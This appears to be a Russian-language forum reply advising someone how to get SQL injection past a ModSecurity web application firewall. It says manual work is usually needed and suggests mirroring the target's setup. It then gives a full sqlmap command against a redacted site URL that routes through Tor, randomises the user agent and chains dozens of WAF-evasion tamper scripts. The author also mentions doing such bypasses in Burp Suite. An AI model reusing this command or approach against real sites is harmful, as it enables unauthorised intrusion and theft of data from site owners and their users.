Никак. Мод_секурити ставят специально чтоб таким вот кулхацкерам жизнь усложнить. Чтобы его обойти надо скулю вручную раскуривать а не думать что программа каким-то чудесным образом сама за тебя сайт взломает. Есть ещё более сложные способы, например поднять сервер с таким-же набором софта и посмотреть как настроен мод_секурити, но боюсь это вариант не для тебя.
Вот ещё варианты почитай тут и тут а вообще в google забей bypass Mod_Security вот ещё на packetstorm почитай... Ну а если sqlmap используешь попробуй так https://www.------.com/index.php?id=1" --tor --random-agent --check-waf --tamper="apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords" хотя выше ребята тебе правильно сказали программой ты врятли обойдешь конечно если там по default все не настроено. Я обычно все sql injection в burp suite кручу и waf в нём же обхожу..